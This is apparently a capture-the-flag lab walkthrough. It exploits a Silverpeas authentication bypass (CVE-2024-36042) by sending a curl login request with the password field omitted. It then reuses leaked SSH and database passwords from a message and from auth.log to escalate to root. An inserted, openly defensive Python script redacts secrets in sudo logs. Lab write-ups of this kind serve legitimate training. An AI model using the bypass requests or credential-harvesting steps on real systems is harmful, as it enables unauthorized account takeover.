Silver Platter
Target Discovery
We begin by identifying open ports on the target machine.
export TARGET_IP=10.10.198.176
nmap -p- -Pn --min-rate 5000 $TARGET_IP
Nmap Scan Results:
Not shown: 65381 closed tcp ports (reset), 151 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
Initial Enumeration
Browsing http://10.10.198.176/#contact, we find a note:
"If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is scr1ptkiddy."
Navigating to http://10.10.198.176:8080/silverpeas/defaultLogin.jsp, we find a login page for Silverpeas.
Exploiting Silverpeas Authentication Bypass (CVE-2024-36042)
A Google search reveals that Silverpeas (up to version 6.3.4) is vulnerable to a simple authentication bypass (CVE-2024-36042). The flaw allows authentication as any user by omitting the password field in the request.
Exploitation
We send an authentication request as scr1ptkiddy without a password:
curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=scr1ptkiddy&DomainId=0"
Response:
HTTP/1.1 302 Found
Set-Cookie: JSESSIONID=XG8ol2dO2luwA5gzNHbDp4jtMig7y6vQn86wTy6S.ebabc79c6d2a; path=/silverpeas; HttpOnly
Gaining Access
Copy the JSESSIONID value from the response and set it in your browser's cookies (Storage Tab -> Cookies -> Modify JSESSIONID).
Now, accessing http://10.10.198.176:8080/silverpeas/look/jsp/MainFrame.jsp, we discover two more users: Administrateur and Manager.
Escalating Privileges
Using the same authentication bypass technique, we attempt login as Manager:
curl -i -X POST http://10.10.198.176:8080/silverpeas/AuthenticationServlet -d "Login=Manager&DomainId=0"
Inside the account, we find a message:
"Dude, how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes."
Username: tim
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
SSH Access as tim
We use the credentials to access the system via SSH:
ssh tim@10.10.198.176
# Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
Verifying user privileges:
id
# uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)
Privilege Escalation
Inspecting authentication logs:
less /var/log/auth.log.2
We find a log entry recording a docker run command that tyler executed via sudo, with a database password passed on the command line:
Dec 13 15:45:57 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/op
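The leak above happens because sudo logs the full command line, so a secret passed as a KEY=VALUE argument (here docker's -e DB_PASSWORD=...) lands in auth.log, readable by the adm group. As an added example that is not part of the original writeup, the Python below scans auth.log-style lines for sudo COMMAND entries carrying credential-looking arguments and produces a redacted copy of each line; the function names, the list of secret-like key names and the sample log lines are my own constructions, modelled on the entry quoted above.

```python
import re
from typing import List, Dict

# Matches the sudo log format shown in the writeup:
# "<date> <host> sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]+)\s(?P<host>\S+)\ssudo:\s+(?P<user>\S+)\s:"
    r".*?;\sUSER=(?P<runas>\S+)\s;\sCOMMAND=(?P<cmd>.*)$"
)

# Key names that usually carry secrets when passed as KEY=VALUE arguments
# (docker -e, env VAR=..., --password=...). Assumed list; extend as needed.
SECRET_KEY_RE = re.compile(
    r"\b(?P<key>[A-Za-z_]*(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY)[A-Za-z_]*)=(?P<val>\S+)",
    re.IGNORECASE,
)


def find_leaked_secrets(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per secret-looking KEY=VALUE inside a sudo COMMAND."""
    findings = []
    for line in lines:
        m = SUDO_RE.match(line)
        if not m:
            continue  # not a sudo entry (sshd, cron, ...)
        for s in SECRET_KEY_RE.finditer(m.group("cmd")):
            findings.append({
                "user": m.group("user"),
                "runas": m.group("runas"),
                "key": s.group("key"),
                # Never copy the secret itself into the report; keep only its length.
                "value_len": len(s.group("val")),
                "cmd": m.group("cmd").split()[0],
            })
    return findings


def redact(line: str) -> str:
    """Rewrite a log line with secret values masked, e.g. before forwarding to a SIEM."""
    return SECRET_KEY_RE.sub(lambda s: f"{s.group('key')}=<REDACTED>", line)


# Constructed sample lines modelled on the auth.log entry quoted in the writeup.
SAMPLE_LOG = [
    "Dec 13 15:45:57 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; "
    "COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas "
    "-e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/",
    "Dec 13 15:46:10 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/apt update",
    "Dec 13 15:47:01 silver-platter sshd[1234]: Accepted password for tim from 10.0.0.5 port 51234 ssh2",
]

if __name__ == "__main__":
    for finding in find_leaked_secrets(SAMPLE_LOG):
        print(finding)
    for entry in SAMPLE_LOG:
        print(redact(entry))
```

Running it on a real /var/log/auth.log* set is a quick way to find secrets that need rotating; the durable fix is to pass them via --env-file or Docker secrets rather than on the command line.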
SSH Access as tyler
Using the extracted password:
ssh tyler@10.10.198.176
# Password: _Zd_zx7N823/
Checking user privileges:
id
# uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
Root Privilege Escalation
Checking sudo privileges:
sudo -l
# (ALL : ALL) ALL
Since tyler has full sudo privileges, we escalate to root:
sudo su
id
# uid=0(root) gid=0(root) groups=0(root)